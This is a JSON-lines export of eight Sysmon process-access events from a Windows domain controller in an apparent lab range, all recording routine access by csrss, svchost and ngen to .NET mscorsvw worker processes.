{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7764,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.981\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001038A60B00}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.981","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001038A60B00}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7765,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001010640C00}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001010640C00}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7766,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.028\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010DDA20A00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.028","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010DDA20A00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7767,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.028\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010DDA20A00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.028","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010DDA20A00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7768,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.028\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010DDA20A00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.028","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010DDA20A00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7769,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.059\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DD060B00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.059","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DD060B00}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7770,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.059\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DD060B00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.059","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DD060B00}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7771,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.059\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DD060B00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.059","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DD060B00}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
